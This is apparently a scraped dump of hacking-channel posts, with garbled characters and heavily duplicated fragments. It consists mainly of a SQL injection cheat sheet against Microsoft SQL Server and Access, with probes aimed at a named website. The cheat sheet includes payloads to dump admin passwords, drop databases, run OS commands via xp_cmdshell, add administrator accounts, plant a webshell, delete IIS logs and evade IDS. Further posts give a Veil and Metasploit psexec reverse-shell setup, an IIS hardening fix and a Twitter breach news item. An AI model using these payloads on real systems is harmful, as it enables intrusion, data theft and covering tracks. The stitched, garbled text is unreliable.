β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦SQL manual injection statement & SQL manual injection Daquan
Look at the following
1. Determine whether there is injection
; and 1=1
; and 1=2
2. Preliminarily determine whether it is mssql
; and user>0
3. Determine the database system
; and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4. The injected parameters are the characters'and
[query condition] and''='
5. There is no filter parameter'and
[query condition] and'%25 when searching '='
6. Guess the database
; and (select Count(*) from [database name])>0
7. Guess the field
; and (select Count(field name) from database name)>0
8. Guess the record length in the field
; and (select top 1 len(field name) from database name)>0
9. (1) Guess the ascii value of the field (access)
; and (select top 1 asc(mid(field name,1,1)) from database name )>0
(2) Guess the ascii value of the field (mssql)
;and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test permission structure (mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1= (select IS_MEMBER('db_owner')); -
11.Add mssql and system accounts
; exec master.dbo.sp_addlogin username; -
;exec master.dbo.sp_password null,username,password; -
;exec master. dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell'net user username password /add';--
;exec master.dbo.xp_cmdshell'net localgroup administrators username /add';--
12.(1) Traverse directories
; create table dirs(paths varchar (100), id int)
;insert dirs exec master.dbo.xp_dirtree'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('δΈζ₯The obtained paths'))>)
(2) Traverse the directory
; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)); -
;insert temp exec master .dbo.xp_availablemedia; - get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs'c:\'; - get a list of subdirectories
; insert into temp(id,num1) exec master.dbo. xp_dirtree'c:\'; - get the directory tree structure of all subdirectories
;insert into temp(id) exec master.dbo.xp_cmdshell'type c:\web\index.asp';-- View the contents of the file
13. The stored procedure
xp_regenumvalues ββin mssql registry root key, subkey
; exec xp_regenumvalues' HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' returns all key values ββin multiple record sets
xp_regread root key, subkey, key value name
; exec xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion' ,'CommonFilesDir' returns the value of the
specified key xp_regwrite root key, subkey, value name, value type, value
There are two types of value types. REG_SZ represents character type, and REG_DWORD represents integer type
; exec xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows \CurrentVersion','TestvalueName','reg_sz','hello' write to the registry
xp_regdeletevalue root key, subkey, value name
exec xp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' delete a value
xp_regdeletekey'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' delete key, including all values ββunder this key
14. mssql backup creation webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ( '');
backup database model to disk='c:\l.asp';
π¦SQL manual injection statement & SQL manual injection Daquan
Look at the following
1. Determine whether there is injection
; and 1=1
; and 1=2
2. Preliminarily determine whether it is mssql
; and user>0
3. Determine the database system
; and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
4. The injected parameters are the characters'and
[query condition] and''='
5. There is no filter parameter'and
[query condition] and'%25 when searching '='
6. Guess the database
; and (select Count(*) from [database name])>0
7. Guess the field
; and (select Count(field name) from database name)>0
8. Guess the record length in the field
; and (select top 1 len(field name) from database name)>0
9. (1) Guess the ascii value of the field (access)
; and (select top 1 asc(mid(field name,1,1)) from database name )>0
(2) Guess the ascii value of the field (mssql)
;and (select top 1 unicode(substring(field name,1,1)) from database name)>0
10. Test permission structure (mssql)
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
;and 1= (select IS_MEMBER('db_owner')); -
11.Add mssql and system accounts
; exec master.dbo.sp_addlogin username; -
;exec master.dbo.sp_password null,username,password; -
;exec master. dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
;exec master.dbo.xp_cmdshell'net user username password /add';--
;exec master.dbo.xp_cmdshell'net localgroup administrators username /add';--
12.(1) Traverse directories
; create table dirs(paths varchar (100), id int)
;insert dirs exec master.dbo.xp_dirtree'c:\'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in('δΈζ₯The obtained paths'))>)
(2) Traverse the directory
; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)); -
;insert temp exec master .dbo.xp_availablemedia; - get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs'c:\'; - get a list of subdirectories
; insert into temp(id,num1) exec master.dbo. xp_dirtree'c:\'; - get the directory tree structure of all subdirectories
;insert into temp(id) exec master.dbo.xp_cmdshell'type c:\web\index.asp';-- View the contents of the file
13. The stored procedure
xp_regenumvalues ββin mssql registry root key, subkey
; exec xp_regenumvalues' HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' returns all key values ββin multiple record sets
xp_regread root key, subkey, key value name
; exec xp_regread'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion' ,'CommonFilesDir' returns the value of the
specified key xp_regwrite root key, subkey, value name, value type, value
There are two types of value types. REG_SZ represents character type, and REG_DWORD represents integer type
; exec xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows \CurrentVersion','TestvalueName','reg_sz','hello' write to the registry
xp_regdeletevalue root key, subkey, value name
exec xp_regdeletevalue'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName' delete a value
xp_regdeletekey'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' delete key, including all values ββunder this key
14. mssql backup creation webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ( '');
backup database model to disk='c:\l.asp';
15.mssql built-in function
; and (select @@version)>0 to obtain the version number of Windows
; and user_name()='dbo' to determine the current Is the system's connected user sa
; and (select user_name())>0 explodes the current system's connected user
; and (select db_name())>0 gets the currently connected database
16. Simple webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ('');
backup database model to disk='g:\wwwtest\l.asp'; When
requesting, use it like this:
http://ip/l.asp ?c=dir
ENJOYβ€οΈππ»
WRITTEN BY
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
; and (select @@version)>0 to obtain the version number of Windows
; and user_name()='dbo' to determine the current Is the system's connected user sa
; and (select user_name())>0 explodes the current system's connected user
; and (select db_name())>0 gets the currently connected database
16. Simple webshell
use model
create table cmd(str image);
insert into cmd(str) values ββ('');
backup database model to disk='g:\wwwtest\l.asp'; When
requesting, use it like this:
http://ip/l.asp ?c=dir
ENJOYβ€οΈππ»
WRITTEN BY
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦HACKING WEBSITE EXAMPLE BY UNDERCODE :
#expertsTips
βββSplit
SQL Server to
determine whether injection is possible:
http://www.exehack.net/article.asp?id=6
http://www.exehack.net/article.asp?id=6β²
http:// www.exehack.net/article.asp?id=6 and 1=1
http://www.exehack.net/article.asp?id=6 and 1=2
http://www.exehack.net/article. asp?action=value' and 1=1
http://www.exehack.net/article.asp?action=value' and 1=2
searchpoints%' and 1=1
searchpoints%' and 1=2
Determine the database type:
http://www.exehack.net/article.asp?id=6 and user>0
http://www.exehack.net/article.asp?id=6 and (select count(*) from sysobjects)>0
Query the current user data information:
article.asp?id=6 having 1=1β
columns in the current table:
article.asp?id=6 group by admin.username having 1=1β
article.asp?id=6 group by admin.username,admin.password having 1=1β
any table and column:
and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top col_name(object_id('admin'),N) from sysobjects)>1
Storm database data:
and (select top 1 password from admin where id=N)>1
Modify the data in the database:
;update admin set password='oooooo' where username='xxx'
Add data in the database:
;insert into admin values ββ(xxx, oooooo)βDelete
database:
;drop database webdata to
obtain the current database user name: and user>0 to
obtain the current database name: and db_name()>0 to
obtain the database version: and (select @@version)>0 to
determine whether multiple sentence queries are supported : ;Declare @a intβ
Determine whether to support sub-queries: and (select count(1) from [sysobjects])>=0
Extended stored procedures of the database: exec master..xp_cmdshell to
view the server C drive directory: ;exec_master..xp_cmdshell'dir c:\' to
determine Does the extended stored procedure exist: and select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' to
restore the extended stored procedure:;exec sp_addextendedproc xp_cmdshell,'xplog70.dll'
delete the extended stored procedure: ;exec sp_dropextendedproc'xp_cmdshell'
provides some functions in MSSQL2000 for accessing OLE objects indirectly to obtain permissions:
;declare @s int
;exec sp_oacreat'wscript.shell',@s
;exec master..spoamethod @s,'run' ,null,'cmd.exe/c dir c:\' to
determine whether the current database user name has higher permissions:
and 1=(select is_srvrolemember('sysadmin'))
and 1=(select is_srvrolemember('serveradmin'))
and 1=(select is_srvrolemember('setupadmin'))
and 1=(select is_srvrolemember('securityadmin'))
and 1=(select is_srvrolemember('diskadmin'))
and 1=(select is_srvrolemember('bulkadmin'))
Determine whether the current database user name is DB_OWNER:
and 1=(select is_member('db_owner'))
stores all database information in the SQLSERVER database system in the master.dbo.sysdatabases table of SQLSERVER. You only need PUBLIC permissions to perform SELECT operations on this table:
and (select top 1 name from master. dbo.sysdatabase order by dbid)>0
and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0
delete log records:
;exec master.dbo.xp_cmdshell'del c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt' to
replace the log record:
; exec master.dbo.xp_cmdshell 'copy c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070404.log c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070606.log> c: \ temp.txt'
Get Path WEB:
; declare @shell int
;exec master..sp_oamethod'wscript.shell',@shell out
;exec master..sp_oamethod @shell,'run',null,'cmd.exe/c dir /sd:/index.asp >c :/log.txt
Use XP_CMDSHELL to search:
;exec master..xp_cmdshell'dir /sd:/index.asp'
command to display server website configuration information:
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc /1/root
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/2/root
Use XP_REGREAD to read with PUBLIC permission:
;exec master.dbo.xp_regread
π¦HACKING WEBSITE EXAMPLE BY UNDERCODE :
#expertsTips
βββSplit
SQL Server to
determine whether injection is possible:
http://www.exehack.net/article.asp?id=6
http://www.exehack.net/article.asp?id=6β²
http:// www.exehack.net/article.asp?id=6 and 1=1
http://www.exehack.net/article.asp?id=6 and 1=2
http://www.exehack.net/article. asp?action=value' and 1=1
http://www.exehack.net/article.asp?action=value' and 1=2
searchpoints%' and 1=1
searchpoints%' and 1=2
Determine the database type:
http://www.exehack.net/article.asp?id=6 and user>0
http://www.exehack.net/article.asp?id=6 and (select count(*) from sysobjects)>0
Query the current user data information:
article.asp?id=6 having 1=1β
columns in the current table:
article.asp?id=6 group by admin.username having 1=1β
article.asp?id=6 group by admin.username,admin.password having 1=1β
any table and column:
and (select top 1 name from (select top N id,name from sysobjects where xtype=char(85)) T order by id desc)>1
and (select top col_name(object_id('admin'),N) from sysobjects)>1
Storm database data:
and (select top 1 password from admin where id=N)>1
Modify the data in the database:
;update admin set password='oooooo' where username='xxx'
Add data in the database:
;insert into admin values ββ(xxx, oooooo)βDelete
database:
;drop database webdata to
obtain the current database user name: and user>0 to
obtain the current database name: and db_name()>0 to
obtain the database version: and (select @@version)>0 to
determine whether multiple sentence queries are supported : ;Declare @a intβ
Determine whether to support sub-queries: and (select count(1) from [sysobjects])>=0
Extended stored procedures of the database: exec master..xp_cmdshell to
view the server C drive directory: ;exec_master..xp_cmdshell'dir c:\' to
determine Does the extended stored procedure exist: and select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' to
restore the extended stored procedure:;exec sp_addextendedproc xp_cmdshell,'xplog70.dll'
delete the extended stored procedure: ;exec sp_dropextendedproc'xp_cmdshell'
provides some functions in MSSQL2000 for accessing OLE objects indirectly to obtain permissions:
;declare @s int
;exec sp_oacreat'wscript.shell',@s
;exec master..spoamethod @s,'run' ,null,'cmd.exe/c dir c:\' to
determine whether the current database user name has higher permissions:
and 1=(select is_srvrolemember('sysadmin'))
and 1=(select is_srvrolemember('serveradmin'))
and 1=(select is_srvrolemember('setupadmin'))
and 1=(select is_srvrolemember('securityadmin'))
and 1=(select is_srvrolemember('diskadmin'))
and 1=(select is_srvrolemember('bulkadmin'))
Determine whether the current database user name is DB_OWNER:
and 1=(select is_member('db_owner'))
stores all database information in the SQLSERVER database system in the master.dbo.sysdatabases table of SQLSERVER. You only need PUBLIC permissions to perform SELECT operations on this table:
and (select top 1 name from master. dbo.sysdatabase order by dbid)>0
and (select top 1 name from master.dbo.sysdatabase where name not in(select top 1 name from master.dbo.sysdatabases order by dbid) order by dbid)>0
delete log records:
;exec master.dbo.xp_cmdshell'del c:\winnt\system32\logfiles\w3svc5\ex070606.log >c:\temp.txt' to
replace the log record:
; exec master.dbo.xp_cmdshell 'copy c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070404.log c: \ winnt \ system32 \ logfiles \ w3svc5 \ ex070606.log> c: \ temp.txt'
Get Path WEB:
; declare @shell int
;exec master..sp_oamethod'wscript.shell',@shell out
;exec master..sp_oamethod @shell,'run',null,'cmd.exe/c dir /sd:/index.asp >c :/log.txt
Use XP_CMDSHELL to search:
;exec master..xp_cmdshell'dir /sd:/index.asp'
command to display server website configuration information:
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc /1/root
cmd /c cscript.exe c:\inetpub\adminscript\adsutil.vbs enum w3svc/2/root
Use XP_REGREAD to read with PUBLIC permission:
;exec master.dbo.xp_regread
hkey_local_machine,
'system\currentcontrolset\services\ w3svc\parameters\virtual roots\'
'/'
Advanced technology under SQLSERVER can refer to the fifth chapter of Script Hacker by Zeng Yunhao.
3. DSqlHelper
detects authority SYSADMIN:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, db_owner.
Check XP_CMDSHELL (CMD command):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_cmdshell')
Check XP_REGREAD (registry read function):
and 1=(SELECT count(*) FROM master .dbo.sysobjects WHERE name='xp_regread')
check SP_MAKEWEBTASK (backup function):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_makewebtask')
check SP_ADDEXTENDEDPROC:
and 1=(SELECT count( *) FROM master.dbo.sysobjects WHERE name ='sp_addextendedproc')
detect XP_SUBDIRS read subdirectory:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_subdirs')
Check XP_DIRTREE read subdirectory:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_dirtree')
content:
; the UPDATE table set field contents = =. 1. 1 WHERE
XP_CMDSHELL detection:
; Exec master..xp_cmdshell 'the dir C: \'
repair XP_CMDSHELL:
; Exec master.dbo.sp_addextendedproc 'the xp_cmdshell', 'Xplog70.dll'
with XP_CMDSHELL add user hacker:
;exec master.dbo.xp_cmdshell'net user hacker 123456 /add'
XP_CMDSHELL add user hacker to ADMIN group:
;exec master.dbo.xp_cmdshell'net localgroup administrators hacker /add'
Create table test:
;create table [dbo].[test] ([dstr][char](255));
test table segment test:
and exists (select * from test)
Read the location of WEB (read the registry):
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into test (dstr) values(@result);-
the absolute path of WEB burst (error mode):
and 1=(select count(*) from test where dstr> 1)
delete table test:
;drop table test ;
βCreate table dirs for viewing directories:
;create table dirs(paths varchar(100), id int)
Add the contents of the viewing directories to table dirs:
;insert dirs exec master.dbo.xp_dirtree'c:\'
explode the contents of the directory dirs:
and 0<>(select top 1 paths from dirs)
Backup database DATANAME:
declare @a sysname; set @a=db_name();backup DATANAME @a to disk='c:\inetpub\wwwroot\down.bak' ;
βDrop table dirs:
;drop table dirs;βCreate
table temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));β
Add the drive list to the temp table:
;insert temp exec master.dbo.xp_availablemedia;β
Delete table temp:
;delete from temp;
βcreate table dirs:
;create table dirs(paths varchar(100), id int);β
get subdirectory list XP_SUBDIRS:
;insert dirs exec master.dbo.xp_subdirs'c:\' ;
βBroken content (error mode):
and 0<>(select top 1 paths from dirs)
delete table dirs:
;delete from dirs;
βcreate table dirs:
;create table dirs(paths varchar(100), id int )
-Use XP_CMDSHELL to view the contents of the directory:
;insert dirs exec master..xp_cmdshell'dir c:\'
delete table dirs:
;delete from dirs;
-check SP_OAcreate (execute command):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='SP_OAcreate')
SP_OAcreate executes CMD command:
;DECLARE @shell INT EXEC SP_OAcreate'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run ',null,'C:\WINNT\system32\cmd.exe /c net user hacker 123456 /add'
SP_OAcreate creates a directory:
;DECLARE @shell INT EXEC SP_OAcreate'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,' run',null,'C:\WINNT\system32\cmd.exe /c md c:\inetpub\wwwroot\1111'
Create a virtual directory E disk:
;declare @o int exec sp_oacreate'wscript.shell', @o out exec sp_oamethod @o,'run', NULL,' cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "default Web site" -v "e","e:\"'
Set virtual directory E to Readable:
;declare @o int exec sp_oacreate'wscript.shell', @o out exec sp_oamethod @o,'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse' to
'system\currentcontrolset\services\ w3svc\parameters\virtual roots\'
'/'
Advanced technology under SQLSERVER can refer to the fifth chapter of Script Hacker by Zeng Yunhao.
3. DSqlHelper
detects authority SYSADMIN:
and 1=(select IS_SRVROLEMEMBER('sysadmin'))
serveradmin, setupadmin, securityadmin, diskadmin, bulkadmin, db_owner.
Check XP_CMDSHELL (CMD command):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_cmdshell')
Check XP_REGREAD (registry read function):
and 1=(SELECT count(*) FROM master .dbo.sysobjects WHERE name='xp_regread')
check SP_MAKEWEBTASK (backup function):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='sp_makewebtask')
check SP_ADDEXTENDEDPROC:
and 1=(SELECT count( *) FROM master.dbo.sysobjects WHERE name ='sp_addextendedproc')
detect XP_SUBDIRS read subdirectory:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_subdirs')
Check XP_DIRTREE read subdirectory:
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='xp_dirtree')
content:
; the UPDATE table set field contents = =. 1. 1 WHERE
XP_CMDSHELL detection:
; Exec master..xp_cmdshell 'the dir C: \'
repair XP_CMDSHELL:
; Exec master.dbo.sp_addextendedproc 'the xp_cmdshell', 'Xplog70.dll'
with XP_CMDSHELL add user hacker:
;exec master.dbo.xp_cmdshell'net user hacker 123456 /add'
XP_CMDSHELL add user hacker to ADMIN group:
;exec master.dbo.xp_cmdshell'net localgroup administrators hacker /add'
Create table test:
;create table [dbo].[test] ([dstr][char](255));
test table segment test:
and exists (select * from test)
Read the location of WEB (read the registry):
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/',@result output insert into test (dstr) values(@result);-
the absolute path of WEB burst (error mode):
and 1=(select count(*) from test where dstr> 1)
delete table test:
;drop table test ;
βCreate table dirs for viewing directories:
;create table dirs(paths varchar(100), id int)
Add the contents of the viewing directories to table dirs:
;insert dirs exec master.dbo.xp_dirtree'c:\'
explode the contents of the directory dirs:
and 0<>(select top 1 paths from dirs)
Backup database DATANAME:
declare @a sysname; set @a=db_name();backup DATANAME @a to disk='c:\inetpub\wwwroot\down.bak' ;
βDrop table dirs:
;drop table dirs;βCreate
table temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));β
Add the drive list to the temp table:
;insert temp exec master.dbo.xp_availablemedia;β
Delete table temp:
;delete from temp;
βcreate table dirs:
;create table dirs(paths varchar(100), id int);β
get subdirectory list XP_SUBDIRS:
;insert dirs exec master.dbo.xp_subdirs'c:\' ;
βBroken content (error mode):
and 0<>(select top 1 paths from dirs)
delete table dirs:
;delete from dirs;
βcreate table dirs:
;create table dirs(paths varchar(100), id int )
-Use XP_CMDSHELL to view the contents of the directory:
;insert dirs exec master..xp_cmdshell'dir c:\'
delete table dirs:
;delete from dirs;
-check SP_OAcreate (execute command):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name='SP_OAcreate')
SP_OAcreate executes CMD command:
;DECLARE @shell INT EXEC SP_OAcreate'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run ',null,'C:\WINNT\system32\cmd.exe /c net user hacker 123456 /add'
SP_OAcreate creates a directory:
;DECLARE @shell INT EXEC SP_OAcreate'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,' run',null,'C:\WINNT\system32\cmd.exe /c md c:\inetpub\wwwroot\1111'
Create a virtual directory E disk:
;declare @o int exec sp_oacreate'wscript.shell', @o out exec sp_oamethod @o,'run', NULL,' cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "default Web site" -v "e","e:\"'
Set virtual directory E to Readable:
;declare @o int exec sp_oacreate'wscript.shell', @o out exec sp_oamethod @o,'run', NULL,' cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse' to
start SERVER service:
;exec master..xp_servicecontrol'start','server'
bypass IDS detection XP_CMDSHELL:
;declare @a sysname set @a='xp_'+'cmdshell' exec @ a'dir c:\ '
Open remote database 1
:; select * from OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=apachy_123','select * from table1' )
Open remote database 2:
;select * from OPENROWSET('SQLOLEDB ','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from table'
ENJOY β€οΈπ
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
;exec master..xp_servicecontrol'start','server'
bypass IDS detection XP_CMDSHELL:
;declare @a sysname set @a='xp_'+'cmdshell' exec @ a'dir c:\ '
Open remote database 1
:; select * from OPENROWSET('SQLOLEDB','server=servername;uid=sa;pwd=apachy_123','select * from table1' )
Open remote database 2:
;select * from OPENROWSET('SQLOLEDB ','uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;','select * from table'
ENJOY β€οΈπ
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
A penetration testerβs guide to sub-domain enumeration.pdf
653.3 KB
A penetration testerβs guide to subdomain enumeration
for beginers
for beginers
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦fix hacked host- lls repair methodes :
> Combined with data sorting and repair plan:
Turn off NTFS 8.3 file format support. This feature is enabled by default, and it is not necessary for most users.
If you are a virtual host space user, please contact the space provider for repair. Vulnerability description: IIS short file name disclosure vulnerability, file enumeration vulnerability exists in IIS implementation, attackers can use this vulnerability to enumerate and obtain files in the root directory of the server.
1. Modify the registry key: (restart the server to take effect)
HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation
The value is 1.
2. Execute the DOS command, fsutil behavior set disable8dot3 1
3. If your web environment does not require asp.net support, you can enter the Internet Information Services (IIS) Manager --- Web Service Extensions-ASP.NET to choose to disable this function.
4. Upgrade net framework to version 4.0 or higher.
5. Delete the existing IIS directory and redeploy, and complete this step to completely repair it.
Copy the contents of the web folder to another location, such as D:\www to D:\www.back, then delete the original folder D:\www, and then rename D:\www.back to D:\www. If you do not copy again, the existing short file name will not disappear.
This operation has been scanned for security penetration, and no IIS short file vulnerabilities have been found.
ENJOY β€οΈπ
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦fix hacked host- lls repair methodes :
> Combined with data sorting and repair plan:
Turn off NTFS 8.3 file format support. This feature is enabled by default, and it is not necessary for most users.
If you are a virtual host space user, please contact the space provider for repair. Vulnerability description: IIS short file name disclosure vulnerability, file enumeration vulnerability exists in IIS implementation, attackers can use this vulnerability to enumerate and obtain files in the root directory of the server.
1. Modify the registry key: (restart the server to take effect)
HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\NtfsDisable8dot3NameCreation
The value is 1.
2. Execute the DOS command, fsutil behavior set disable8dot3 1
3. If your web environment does not require asp.net support, you can enter the Internet Information Services (IIS) Manager --- Web Service Extensions-ASP.NET to choose to disable this function.
4. Upgrade net framework to version 4.0 or higher.
5. Delete the existing IIS directory and redeploy, and complete this step to completely repair it.
Copy the contents of the web folder to another location, such as D:\www to D:\www.back, then delete the original folder D:\www, and then rename D:\www.back to D:\www. If you do not copy again, the existing short file name will not disappear.
This operation has been scanned for security penetration, and no IIS short file vulnerabilities have been found.
ENJOY β€οΈπ
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Twitter is afraid of being investigated again and proactively report hacking incidents to the EU
#NEWS
> Sina Technology News on the evening of July 22, Beijing time, according to foreign media reports, a few days after the worst security breach in the companyβs history, TwitterTake the initiative to report the incident to the EU data protection agency.
> Graham Doyle, spokesperson for the EU data protection agency, the Irish Data Protection Commission (DPC), said today that the regulator has received notification of the incident. DPC is the main regulatory agency for Twitter and other American technology companies in the European Union, because these companies have their European headquarters in Ireland.
>Currently, Twitter is working hard to deal with this most serious security incident. Twitter announced on Wednesday night that hackers had hijacked including Democratic presidential candidate Joe Biden, former President Barack Obama, and reality TV star Kim Kardai by obtaining control of Twitter employee credentials. Shan (Kim Kardashian) and tech billionaire and TeslaAccounts including founder Elon Musk.
> Twitter later stated that the hackers locked 130 accounts this time, controlled 45 of them by resetting their passwords, and issued "tweets" (Twitter messages) through them. In addition, Twitter also confirmed that the attackers successfully manipulated a small number of internal employees and used their credentials to access Twitter's internal systems.
> In May 2018, the EUβs new data privacy regulation, the General Data Protection Regulation (GDPR), came into effect. In October of the same year, Twitter was investigated for user data tracking in Europe. This is also the first time that Twitter has encountered an investigation after the GDPR took effect. (Li Ming)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Twitter is afraid of being investigated again and proactively report hacking incidents to the EU
#NEWS
> Sina Technology News on the evening of July 22, Beijing time, according to foreign media reports, a few days after the worst security breach in the companyβs history, TwitterTake the initiative to report the incident to the EU data protection agency.
> Graham Doyle, spokesperson for the EU data protection agency, the Irish Data Protection Commission (DPC), said today that the regulator has received notification of the incident. DPC is the main regulatory agency for Twitter and other American technology companies in the European Union, because these companies have their European headquarters in Ireland.
>Currently, Twitter is working hard to deal with this most serious security incident. Twitter announced on Wednesday night that hackers had hijacked including Democratic presidential candidate Joe Biden, former President Barack Obama, and reality TV star Kim Kardai by obtaining control of Twitter employee credentials. Shan (Kim Kardashian) and tech billionaire and TeslaAccounts including founder Elon Musk.
> Twitter later stated that the hackers locked 130 accounts this time, controlled 45 of them by resetting their passwords, and issued "tweets" (Twitter messages) through them. In addition, Twitter also confirmed that the attackers successfully manipulated a small number of internal employees and used their credentials to access Twitter's internal systems.
> In May 2018, the EUβs new data privacy regulation, the General Data Protection Regulation (GDPR), came into effect. In October of the same year, Twitter was investigated for user data tracking in Europe. This is also the first time that Twitter has encountered an investigation after the GDPR took effect. (Li Ming)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦AVBypass :
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦AVBypass :
Generate executable using Veil.enjoyβ€οΈππ»
2) In msfconsole setup psexec with relevant payload (windows/meterpreter/reverse_tcp)
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /root/Desktop/Misc/Veil-master/payload.exe
EXE::Custom => /root/Desktop/Misc/Veil-master/payload.exe
